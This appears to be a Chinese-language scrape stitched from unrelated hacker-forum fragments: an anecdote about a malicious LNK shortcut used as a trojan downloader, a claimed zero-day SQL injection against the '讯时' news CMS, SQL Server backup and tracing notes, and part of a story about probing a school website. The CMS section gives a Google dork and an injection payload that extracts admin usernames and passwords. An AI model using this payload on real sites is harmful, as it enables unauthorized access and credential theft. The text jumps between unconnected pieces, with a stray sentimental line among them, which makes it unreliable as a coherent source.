昨天看到windows又爆出了一个关于lnk文件的 Zero Day，回家的路上搜索了下脑海中关于桌面快捷方式（LNK文件）有趣的事情，在这里贴出来和大家一起分享


一 LNK文件也可以成为一个木马下载器

1 一封垃圾邮件引发的病毒事件

2009年3月4日,大概是这一天，我拿到了一个台灣為何變窮的样本。具体是某人收到一封垃圾邮件，主题“看看我們的台灣要員是怎麼花納稅人的錢的”，寥 寥数语没意思，而附件的名为台灣為何變窮.lnk的快捷方式似乎没有什么特别的，但是当你查看属性的时候，会看到一些灵异的字符串，而熟悉命令行的将很容 易发现它在干什么
...

经测试此0day通杀所有讯时系统。

google关键字inurl:news_more.asp?lm2=


复制 代码

1. /admin/admin_news_pl_view.asp?id=1   //id任意 填入以下语句
2. 有时1显示错误信息的时候继续往后退2，3，4。。。。
3. |'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
...

恩......

请不要催促他们----因为你在慢慢长大,而他们却在慢慢变老.......

在图形界面下，可以用事件探查器来跟踪sql server，多用在调试程序的时候，我们可以清楚地看到我们的程序向SQL SERVER发送了什么样的语句 ，有错误的话也很容易被发现。

如果没有图形界面，可以利用下面的语句来监控整台数据库服务器执行了哪些SQL语句 ，并保存到文件中， HACK中具体有什么作用就各自发挥吧。。要求SA权限。。

--完整备份
Backup Database NorthwindCS
To disk='G:\Backup\NorthwindCS_Full_20070908.bak'

--差异备份
Backup Database NorthwindCS
...

sql server 2005 用户、组或角色 在当前数据库中已存在

问题：1. sql server2005 修改系统表不能修改
       2. 错误信息：sql server 2005 用户、组或角色 在当前数据库中已存在

想手工把登录名与数据库中的用户名进行关联, 系统不让; 想删除数据库中的用户再重建, 竟然也不让删……

前段时间朋友丢了一个站过来，说是他们学校的。叫我帮忙检测下。
于是看了下。用扫描器扫了下，没有啥可以上传利用的，发现后台，默认和万能密码无效，
无注入点，手工和工具试过了，防注入，COOKIES注入也不行。找不到程序源码，没办法分析。旁注 ？
整站是独立服务器，就一个站，旁注也没办法。难到要C段？好麻烦哦。丢给群里一些大牛看看，
都说搞不定（应该是没认真看吧。），我大受打击，但是我不放弃，再去看看先。
于是，发现了一个搜索框，直觉告诉我，这就是突破点，果然.....

 判断数据库用到的注释符：

                          --    MSSQL注释符    /*    MYSQL注释符  

“少个蛋你会死啊！”

                                ————————旁白：会死，会死！